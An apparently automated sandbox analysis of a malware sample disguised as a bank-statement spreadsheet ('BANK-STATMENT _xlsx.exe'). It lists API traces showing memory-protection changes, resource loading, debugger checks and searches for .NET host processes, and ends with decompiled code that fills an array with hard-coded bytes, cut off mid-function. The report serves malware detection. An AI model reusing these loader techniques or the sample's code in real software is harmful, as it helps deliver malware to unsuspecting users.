                                                                                • String ID: `I$C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe$C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                                • API String ID: 3419322617-546741878
                                                                                • Opcode ID: d63fb0d63074ba50d38bb95be78e26fa8d392a70f9c5825fc44401a99d96c974
                                                                                • Instruction ID: fa47b57a85d087020d92033c6ce2aeeea61bb3e428919a219cd19c41fd7a2f06
                                                                                • Opcode Fuzzy Hash: d63fb0d63074ba50d38bb95be78e26fa8d392a70f9c5825fc44401a99d96c974
                                                                                • Instruction Fuzzy Hash: 4461A131900258EFCF21EBA1DC85AAE3BA8FB34305F14147BE505E2261D7788A85CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CreateFile_memset
                                                                                • String ID: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe$WINTRUST.dll$clr.dll$mscoree.dll$mscoreei.dll$mscorwks.dll
                                                                                • API String ID: 3830271748-4283035619
                                                                                • Opcode ID: cb9e5fe3e7d12808937490739dd8b717b2bdc96d76e9703b4b4b647e86b79c74
                                                                                • Instruction ID: 27948e0b197ab65fc848057314db705bc747f7ae27c3443865b2f1a2557d49c9
                                                                                • Opcode Fuzzy Hash: cb9e5fe3e7d12808937490739dd8b717b2bdc96d76e9703b4b4b647e86b79c74
                                                                                • Instruction Fuzzy Hash: 8C51AF5161011A96CF20BF24CC11AFB3662BB34B94B944A77DC4587358F72BDA8AC368
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\.NETFramework,00000000,00020019,?), ref: 0048F71D
                                                                                • _memset.LIBCMT ref: 0048F744
                                                                                • RegQueryValueExW.KERNEL32(?,InstallRoot,00000000,?,?,?), ref: 0048F76D
                                                                                • _memset.LIBCMT ref: 0048F78B
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00496000,000000FF,?,00000104), ref: 0048F7A9
                                                                                • RegCloseKey.KERNEL32(00000000), ref: 0048F829
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: _memset$ByteCharCloseMultiOpenQueryValueWide
                                                                                • String ID: InstallRoot$Software\Microsoft\.NETFramework
                                                                                • API String ID: 3047945766-4217373442
                                                                                • Opcode ID: 3604942e84e9f2fe3cbae7702f4ed147f09d9abfb9c1b00c63149748af7d8470
                                                                                • Instruction ID: e213da734bf04768acd83674f95f575279fa158ac3039e7ac73ccee881e432fb
                                                                                • Opcode Fuzzy Hash: 3604942e84e9f2fe3cbae7702f4ed147f09d9abfb9c1b00c63149748af7d8470
                                                                                • Instruction Fuzzy Hash: 7331D472A0021AABDB20AB949C45BEFB7F8EF44754F1041B7F905E3250E7B45E84CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ExistsFilePath_memset
                                                                                • String ID: CasPol.exe$RegAsm.exe$RegSvcs.exe$dfsvc.exe$jsc.exe
                                                                                • API String ID: 4214796376-2149642370
                                                                                • Opcode ID: 0b1a0cd38bcae4b6215c639aca203f86b5e0e48c57dbece2aaf5b58b28472694
                                                                                • Instruction ID: e67d0945219b46a94c3d569c8aac3861b262f67e8beb429f0986b9de818479d6
                                                                                • Opcode Fuzzy Hash: 0b1a0cd38bcae4b6215c639aca203f86b5e0e48c57dbece2aaf5b58b28472694
                                                                                • Instruction Fuzzy Hash: 36219731900209AACF11EFA8D9546FE77B4FF45345F004576E846E7211F7744E4A9B98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 004901FD
                                                                                  • Part of subcall function 0048F89E: GetCurrentProcess.KERNEL32 ref: 0048F8AB
                                                                                  • Part of subcall function 0048F89E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0048F8C5
                                                                                  • Part of subcall function 0048F89E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F8FD
                                                                                  • Part of subcall function 0048F89E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F929
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ModuleProcess$BaseCurrentEnumInformationModulesName_memset
                                                                                • String ID: CRYPT32.dll$clr.dll$imagehlp.dll$mscoree.dll$mscoreei.dll
                                                                                • API String ID: 1620000358-1444991907
                                                                                • Opcode ID: 66be2dd1b25c7051a1f9a2a3cbab56e1b26913e4b7dd0e5cb529b6234ada6842
                                                                                • Instruction ID: db1a365c1f949f841781de154625547609794dc9d783144385055322e9d575ed
                                                                                • Opcode Fuzzy Hash: 66be2dd1b25c7051a1f9a2a3cbab56e1b26913e4b7dd0e5cb529b6234ada6842
                                                                                • Instruction Fuzzy Hash: F14187116101129ECF70AF34CC49AF73A669F34BA4B8446B6DC55CB399F72ACE85C358
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 0048FD9D
                                                                                  • Part of subcall function 0048904F: __FF_MSGBANNER.LIBCMT ref: 00489072
                                                                                  • Part of subcall function 0048904F: __NMSG_WRITE.LIBCMT ref: 00489079
                                                                                  • Part of subcall function 0048904F: RtlAllocateHeap.NTDLL(00000000,?), ref: 004890C6
                                                                                • VirtualProtect.KERNEL32(00000000,?,00000040,00000000), ref: 0048FDB4
                                                                                • VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 0048FDC2
                                                                                • _memset.LIBCMT ref: 0048FE03
                                                                                • VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0048FE14
                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 0048FE1C
                                                                                • FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 0048FE23
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ProtectVirtual$AllocateCacheCurrentFlushHeapInstructionProcess_malloc_memset
                                                                                • String ID:
                                                                                • API String ID: 851286602-0
                                                                                • Opcode ID: 97e2672645e9c69dc5907727198ace62bff49fbe0b680271770fc1edecf04727
                                                                                • Instruction ID: bcffd8cd40d6532149c6807460895040980dc854defc66bebcdc605edb1d7188
                                                                                • Opcode Fuzzy Hash: 97e2672645e9c69dc5907727198ace62bff49fbe0b680271770fc1edecf04727
                                                                                • Instruction Fuzzy Hash: 7D21B0B6500245AFC711DFA8DD88DAE7BBCEB55600B01467BF60AC62A2E734D604CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00490042
                                                                                • FindResourceW.KERNEL32(00000000,000003E8,0000000A), ref: 00490056
                                                                                • SizeofResource.KERNEL32(00000000,00000000), ref: 00490064
                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0049007B
                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00490085
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004900AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: Resource$Virtual$AllocFindFreeHandleLoadModuleSizeof
                                                                                • String ID:
                                                                                • API String ID: 3588284000-0
                                                                                • Opcode ID: f921b2cb65fd52afc1d819e75db8ff60ce292697d9ea2d59b90c6a8fe82563d0
                                                                                • Instruction ID: 5ff3337369aea6f0979f138135c280e8d1317291e8a5e21f8052689e222425fe
                                                                                • Opcode Fuzzy Hash: f921b2cb65fd52afc1d819e75db8ff60ce292697d9ea2d59b90c6a8fe82563d0
                                                                                • Instruction Fuzzy Hash: 0401A2757403027FEB322B657C49F6B3A6CAF55B85F100032FB01E5290EAA9CD00427A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 004903D2
                                                                                  • Part of subcall function 0048F89E: GetCurrentProcess.KERNEL32 ref: 0048F8AB
                                                                                  • Part of subcall function 0048F89E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0048F8C5
                                                                                  • Part of subcall function 0048F89E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F8FD
                                                                                  • Part of subcall function 0048F89E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F929
                                                                                • LoadLibraryExW.KERNEL32(?,?,?), ref: 004903F2
                                                                                • StrStrIW.SHLWAPI(?,\system.ni.dll), ref: 00490402
                                                                                  • Part of subcall function 004900F0: CloseHandle.KERNEL32 ref: 004900FA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ModuleProcess$BaseCloseCurrentEnumHandleInformationLibraryLoadModulesName_memset
                                                                                • String ID: \system.ni.dll
                                                                                • API String ID: 2189784845-482435895
                                                                                • Opcode ID: 3be855fd07bef2cddc7d767611ae40822e5f09e6e390b2353af18598a6bde938
                                                                                • Instruction ID: 73b4f87d6250eb690caff7364d9c7fdd069252db4ca6b9fb13f5fea0bc35386b
                                                                                • Opcode Fuzzy Hash: 3be855fd07bef2cddc7d767611ae40822e5f09e6e390b2353af18598a6bde938
                                                                                • Instruction Fuzzy Hash: 08F08231900218BBCF11BFA4CC0AE9F3BACAF14340F004476BE15D6162EA35CA609BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 0048F8AB
                                                                                • EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0048F8C5
                                                                                • GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F8FD
                                                                                • GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F929
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ModuleProcess$BaseCurrentEnumInformationModulesName
                                                                                • String ID:
                                                                                • API String ID: 3431743260-0
                                                                                • Opcode ID: c462b2cf8e986fca7a4033d7664763f5ec0a38fef71ee16c3d28f3c4f29a8d27
                                                                                • Instruction ID: 602899437411f3f68849e07e5ee4a6251060a2c53d2113e09e653eef3ff0685e
                                                                                • Opcode Fuzzy Hash: c462b2cf8e986fca7a4033d7664763f5ec0a38fef71ee16c3d28f3c4f29a8d27
                                                                                • Instruction Fuzzy Hash: 4621627154010ABBDF10FB98C985AEEB779EF14344F104876E541E2150D774AE5ACB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 0048F493
                                                                                • VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0048F4BA
                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 0048F4C0
                                                                                • FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 0048F4C7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                                • String ID:
                                                                                • API String ID: 4115577372-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                • String ID:
                                                                                • API String ID: 310444273-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32(00000000,004891FB), ref: 0048ABDB
                                                                                • __malloc_crt.LIBCMT ref: 0048AC09
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0048AC16
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                • String ID:
                                                                                • API String ID: 237123855-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?), ref: 00490366
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00490373
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00490381
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                • String ID:
                                                                                • API String ID: 310444273-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0048FA13
                                                                                  • Part of subcall function 0048F89E: GetCurrentProcess.KERNEL32 ref: 0048F8AB
                                                                                  • Part of subcall function 0048F89E: EnumProcessModules.PSAPI(00000000,?,00001000,?), ref: 0048F8C5
                                                                                  • Part of subcall function 0048F89E: GetModuleInformation.PSAPI(?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F8FD
                                                                                  • Part of subcall function 0048F89E: GetModuleBaseNameW.PSAPI(?,?,?,00000104,?,?,00000000,0000000C,?,?,?,00000000,?,00001000,?), ref: 0048F929
                                                                                Strings
                                                                                • C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe, xrefs: 0048FA2A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ModuleProcess$BaseCurrentEnumInformationModulesName_memset
                                                                                • String ID: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                                • API String ID: 1620000358-3735718670
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,00000004,?), ref: 0048F981
                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 0048F9DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • FindCloseChangeNotification.KERNEL32(?), ref: 004900E5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ChangeCloseFindNotification
                                                                                • String ID:
                                                                                • API String ID: 2591292051-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0048A141
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CreateHeap
                                                                                • String ID:
                                                                                • API String ID: 10892065-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __encode_pointer.LIBCMT ref: 0048AF49
                                                                                  • Part of subcall function 0048AED5: TlsGetValue.KERNEL32(00000000,?,0048AF4E,00000000,0048C256,00494120,00000000,00000314,?,0048A603,00494120,Microsoft Visual C++ Runtime Library,00012010), ref: 0048AEE7
                                                                                  • Part of subcall function 0048AED5: TlsGetValue.KERNEL32(00000005,?,0048AF4E,00000000,0048C256,00494120,00000000,00000314,?,0048A603,00494120,Microsoft Visual C++ Runtime Library,00012010), ref: 0048AEFE
                                                                                  • Part of subcall function 0048AED5: RtlEncodePointer.NTDLL(00000000,?,0048AF4E,00000000,0048C256,00494120,00000000,00000314,?,0048A603,00494120,Microsoft Visual C++ Runtime Library,00012010), ref: 0048AF3C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: Value$EncodePointer__encode_pointer
                                                                                • String ID:
                                                                                • API String ID: 2585649348-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0048FFAD
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0048FF04
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CloseHandle.KERNEL32 ref: 004900FA
                                                                                  • Part of subcall function 0048F46C: VirtualProtect.KERNEL32(?,?,00000040,00000000), ref: 0048F493
                                                                                  • Part of subcall function 0048F46C: VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 0048F4BA
                                                                                  • Part of subcall function 0048F46C: GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00000000), ref: 0048F4C0
                                                                                  • Part of subcall function 0048F46C: FlushInstructionCache.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 0048F4C7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ProtectVirtual$CacheCloseCurrentFlushHandleInstructionProcess
                                                                                • String ID:
                                                                                • API String ID: 2900862000-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32 ref: 0048DB4E
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0048DB63
                                                                                • UnhandledExceptionFilter.KERNEL32(FI), ref: 0048DB6E
                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0048DB8A
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 0048DB91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                • String ID: FI
                                                                                • API String ID: 2579439406-1293059371
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00001704), ref: 0048A74B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Offset: 00497000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 75%
                                                                                			E0040B1E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                				char* _v8;
                                                                                				char _v12;
                                                                                				signed char* _v16;
                                                                                				signed char* _v20;
                                                                                				signed char* _v24;
                                                                                				char _v152;
                                                                                				char _v153;
                                                                                				char _v154;
                                                                                				char _v155;
                                                                                				char _v156;
                                                                                				char _v157;
                                                                                				char _v158;
                                                                                				char _v159;
                                                                                				char _v160;
                                                                                				char _v161;
                                                                                				char _v162;
                                                                                				char _v163;
                                                                                				char _v164;
                                                                                				char _v165;
                                                                                				char _v166;
                                                                                				char _v167;
                                                                                				char _v168;
                                                                                				char _v169;
                                                                                				char _v170;
                                                                                				char _v171;
                                                                                				char _v172;
                                                                                				char _v173;
                                                                                				char _v174;
                                                                                				char _v175;
                                                                                				char _v176;
                                                                                				char _v177;
                                                                                				char _v178;
                                                                                				char _v179;
                                                                                				char _v180;
                                                                                				char _v181;
                                                                                				char _v182;
                                                                                				char _v183;
                                                                                				char _v184;
                                                                                				char _v185;
                                                                                				char _v186;
                                                                                				char _v187;
                                                                                				char _v188;
                                                                                				char _v189;
                                                                                				char _v190;
                                                                                				char _v191;
                                                                                				char _v192;
                                                                                				char _v193;
                                                                                				char _v194;
                                                                                				char _v195;
                                                                                				char _v196;
                                                                                				char _v197;
                                                                                				char _v198;
                                                                                				char _v199;
                                                                                				char _v200;
                                                                                				char _v201;
                                                                                				char _v202;
                                                                                				char _v203;
                                                                                				char _v204;
                                                                                				char _v205;
                                                                                				char _v206;
                                                                                				char _v207;
                                                                                				char _v208;
                                                                                				char _v209;
                                                                                				char _v210;
                                                                                				char _v211;
                                                                                				char _v212;
                                                                                				char _v213;
                                                                                				char _v214;
                                                                                				char _v215;
                                                                                				char _v216;
                                                                                				char _v217;
                                                                                				char _v218;
                                                                                				char _v219;
                                                                                				char _v220;
                                                                                				char _v221;
                                                                                				char _v222;
                                                                                				char _v223;
                                                                                				char _v224;
                                                                                				char _v225;
                                                                                				char _v226;
                                                                                				char _v227;
                                                                                				char _v228;
                                                                                				char _v229;
                                                                                				char _v230;
                                                                                				signed char* _v231;
                                                                                				char _v232;
                                                                                				char _v233;
                                                                                				char _v234;
                                                                                				char _v235;
                                                                                				char _v236;
                                                                                				char _v237;
                                                                                				char _v238;
                                                                                				char _v239;
                                                                                				char _v240;
                                                                                				char _v241;
                                                                                				char _v242;
                                                                                				char _v243;
                                                                                				char _v244;
                                                                                				char _v245;
                                                                                				char _v246;
                                                                                				char _v247;
                                                                                				char _v248;
                                                                                				char _v249;
                                                                                				char _v250;
                                                                                				char _v251;
                                                                                				char _v252;
                                                                                				char _v253;
                                                                                				char _v254;
                                                                                				char _v255;
                                                                                				char _v256;
                                                                                				char _v257;
                                                                                				char _v258;
                                                                                				char _v259;
                                                                                				char _v260;
                                                                                				char _v261;
                                                                                				char _v262;
                                                                                				char _v263;
                                                                                				char _v264;
                                                                                				char _v265;
                                                                                				char _v266;
                                                                                				char _v267;
                                                                                				char _v268;
                                                                                				char _v269;
                                                                                				char _v270;
                                                                                				char _v271;
                                                                                				char _v272;
                                                                                				char _v273;
                                                                                				char _v274;
                                                                                				char _v275;
                                                                                				char _v276;
                                                                                				char _v277;
                                                                                				char _v278;
                                                                                				char _v279;
                                                                                				char _v280;
                                                                                				signed char* _v284;
                                                                                				char _v288;
                                                                                				intOrPtr _v292;
                                                                                				intOrPtr _v296;
                                                                                				signed int _v300;
                                                                                				char _v320;
                                                                                				void _v348;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* _t178;
                                                                                				void* _t180;
                                                                                				void* _t182;
                                                                                				signed char* _t184;
                                                                                				intOrPtr _t219;
                                                                                				signed int _t231;
                                                                                				intOrPtr _t242;
                                                                                
                                                                                				_t242 = __ecx;
                                                                                				_push(0x44356c);
                                                                                				_v292 = __ecx;
                                                                                				_a4 = _a4 + 4;
                                                                                				_t178 = E0041105D(_a4 + 4);
                                                                                				_push(_t178);
                                                                                				L0044B581();
                                                                                				_t219 = _a8;
                                                                                				if(_t178 == 0) {
                                                                                					E00411069(E0041105D(_t219 + 4) | 0xffffffff, __ecx + 0x2c, _t216);
                                                                                				}
                                                                                				_push(0x44357c);
                                                                                				_t180 = E0041105D(_a4);
                                                                                				_push(_t180);
                                                                                				L0044B581();
                                                                                				if(_t180 == 0) {
                                                                                					E00411069(E0041105D(_t219 + 4) | 0xffffffff, _t242 + 0x40, _t212);
                                                                                				}
                                                                                				_push(0x443588);
                                                                                				_t182 = E0041105D(_a4);
                                                                                				_push(_t182);
                                                                                				L0044B581();
                                                                                				if(_t182 == 0) {
                                                                                					E00411069(E0041105D(_t219 + 4) | 0xffffffff, _t242 + 0x54, _t208);
                                                                                				}
                                                                                				_push(0x443598);
                                                                                				_t184 = E0041105D(_a4);
                                                                                				_push(_t184);
                                                                                				L0044B581();
                                                                                				if(_t184 != 0) {
                                                                                					L13:
                                                                                					return _t184;
                                                                                				} else {
                                                                                					_v24 = _t184;
                                                                                					_v16 = _t184;
                                                                                					_v20 = _t184;
                                                                                					_v280 = 0x1d;
                                                                                					_v279 = 0xac;
                                                                                					_v278 = 0xa8;
                                                                                					_v277 = 0xf8;
                                                                                					_v276 = 0xd3;
                                                                                					_v275 = 0xb8;
                                                                                					_v274 = 0x48;
                                                                                					_v273 = 0x3e;
                                                                                					_v272 = 0x48;
                                                                                					_v271 = 0x7d;
                                                                                					_v270 = 0x3e;
                                                                                					_v269 = 0xa;
                                                                                					_v268 = 0x62;
                                                                                					_v267 = 7;
                                                                                					_v266 = 0xdd;
                                                                                					_v265 = 0x26;
                                                                                					_v264 = 0xe6;
                                                                                					_v263 = 0x67;
                                                                                					_v262 = 0x81;
                                                                                					_v261 = 3;
                                                                                					_v260 = 0xe7;
                                                                                					_v259 = 0xb2;
                                                                                					_v258 = 0x13;
                                                                                					_v257 = 0xa5;
                                                                                					_v256 = 0xb0;
                                                                                					_v255 = 0x79;
                                                                                					_v254 = 0xee;
                                                                                					_v253 = 0x4f;
                                                                                					_v252 = 0xf;
                                                                                					_v251 = 0x41;
                                                                                					_v250 = 0x15;
                                                                                					_v249 = 0xed;
                                                                                					_v248 = 0x7b;
                                                                                					_v247 = 0x14;
                                                                                					_v246 = 0x8c;
                                                                                					_v245 = 0xe5;
                                                                                					_v244 = 0x4b;
                                                                                					_v243 = 0x46;
                                                                                					_v242 = 0xd;
                                                                                					_v241 = 0xc1;
                                                                                					_v240 = 0x8e;
                                                                                					_v239 = 0xfe;
                                                                                					_v238 = 0xd6;
                                                                                					_v237 = 0xe7;
                                                                                					_v236 = 0x27;
                                                                                					_v235 = 0x75;
                                                                                					_v234 = 6;
                                                                                					_v233 = 0x8b;
                                                                                					_v232 = 0x49;
                                                                                					_v231 = _t184;
                                                                                					_v230 = 0xdc;
                                                                                					_v229 = 0xf;
                                                                                					_v228 = 0x30;
                                                                                					_v227 = 0xa0;
                                                                                					_v226 = 0x9e;
                                                                                					_v225 = 0xfd;
                                                                                					_v224 = 9;
                                                                                					_v223 = 0x85;
                                                                                					_v222 = 0xf1;
                                                                                					_v221 = 0xc8;
                                                                                					_v220 = 0xaa;
                                                                                					_v219 = 0x75;
                                                                                					_v218 = 0xc1;
                                                                                					_v217 = 8;
                                                                                					_v216 = 5;
                                                                                					_v215 = 0x79;
                                                                                					_v214 = 1;
                                                                                					_v213 = 0xe2;
                                                                                					_v212 = 0x97;
                                                                                					_v211 = 0xd8;
                                                                                					_v210 = 0xaf;
                                                                                					_v209 = 0x80;
                                                                                					_v208 = 0x38;
                                                                                					_v207 = 0x60;
                                                                                					_v206 = 0xb;
                                                                                					_v205 = 0x71;
                                                                                					_v204 = 0xe;
                                                                                					_v203 = 0x68;
                                                                                					_push(0x80);
                                                                                					_push(_t184);
                                                                                					_push( &_v152);
                                                                                					_v202 = 0x53;
                                                                                					_v201 = 0x77;
                                                                                					_v200 = 0x2f;
                                                                                					_v199 = 0xf;
                                                                                					_v198 = 0x61;
                                                                                					_v197 = 0xf6;
                                                                                					_v196 = 0x1d;
